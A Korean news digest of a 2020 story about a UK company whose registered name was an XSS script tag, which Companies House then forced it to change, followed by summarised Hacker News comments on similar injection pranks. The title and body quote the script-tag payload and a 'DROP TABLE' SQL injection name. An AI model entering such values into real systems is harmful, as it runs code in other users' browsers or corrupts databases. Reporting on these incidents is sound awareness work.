GN⁺: “><SCRIPT SRC=HTTPS://MJT.XSS.HT> LTD” 사명 변경 강요 (2020)
(theguardian.com)-
회사 이름 변경 강제
- Companies House가 보안 위험을 이유로 회사 이름 변경을 강제함
- 원래 이름은 "“><SCRIPT SRC=HTTPS://MJT.XSS.HT>; LTD"였으며, 이는 크로스 사이트 스크립팅(XSS) 공격에 취약한 이름이었음
- XSSHunter 사이트에서 스크립트를 로드하여 경고 메시지를 표시하는 방식으로 보안 취약점을 증명함
-
이름 변경의 배경
- 영국 소프트웨어 엔지니어가 재미와 장난기 있는 이름으로 회사를 설립함
- Companies House가 해당 이름이 보안 위험을 초래할 수 있음을 인지하고 이름 변경을 요구함
- 이전에도 유사한 이름이 등록된 적이 있으나, 이번 사례가 처음으로 대응을 유발함
-
보안 조치
- Companies House는 보안 위험을 줄이기 위해 즉각적인 조치를 취하고 유사한 사례가 발생하지 않도록 예방 조치를 마련함
- 회사 이름은 현재 "THAT COMPANY WHOSE NAME USED TO CONTAIN HTML SCRIPT TAGS LTD"로 변경됨
-
회사 디렉터의 입장
- 회사 디렉터는 정부 디지털 서비스(GDS)가 보안에 대해 좋은 평판을 가지고 있어 문제가 없을 것이라 생각했음
- 문제가 발견되자마자 Companies House와 국가 사이버 보안 센터에 즉시 연락함
GN⁺의 정리
- 이 기사는 회사 이름에 HTML 코드가 포함될 경우 발생할 수 있는 보안 위험을 다루고 있음
- 크로스 사이트 스크립팅(XSS)과 같은 보안 취약점에 대한 경각심을 일깨워 줌
- 비슷한 기능을 가진 산업 내 다른 프로젝트로는 OWASP의 보안 가이드라인을 추천할 수 있음
- 이 기사는 보안에 대한 인식을 높이고, 회사 이름 등록 시 보안 고려의 중요성을 강조함
Hacker News 의견
-
한 사용자가 주차장 터미널에서 Windows 운영 체제와 안티바이러스 소프트웨어를 악용한 사례를 공유함. QR 코드에 EICAR 테스트 문자열을 인코딩하여 스캐너에 넣었더니 안티바이러스 팝업이 터미널 화면을 가려 사용 불가능하게 만들었음
-
법률 변경을 필요로 했던 훌륭한 트롤링 사례로, 회사 이름에 컴퓨터 코드를 포함할 수 없도록 법이 개정되었음
-
2014년 폴란드의 한 운전자가 속도 카메라를 피하기 위해 번호판에 SQL 인젝션을 추가한 사례가 있었음
-
한 회사는 HTML 스크립트 태그를 포함한 이름을 사용하다가 법적으로 이름을 변경해야 했음
-
창립자의 이름이 "ROBERT'); DROP TABLE STUDENTS;"로, 이는 유명한 Little Bobby Tables 사례를 연상시킴
-
2000년경 Coke Auction에서 스크립트를 사용하여 경매에서 다른 사람이 입찰하지 못하게 했던 경험을 공유함. 많은 물건을 얻었지만 결국 계정이 삭제되고 Coke UK로부터 경고를 받았음
-
RSS 피드에서 제목 요소가 HTML인지 일반 텍스트인지 명확하지 않다는 문제를 지적함. Atom은 제목 요소를 명확히 일반 텍스트로 처리하도록 명시하고 있음
-
한 회사가 보안 위험을 초래할 수 있는 문자로 등록되었으나, Companies House 자체에는 영향을 미치지 않았고, 일부 고객의 보안이 취약했을 가능성이 있다고 언급됨
-
2020년 기사에서 관련 사례가 다루어졌음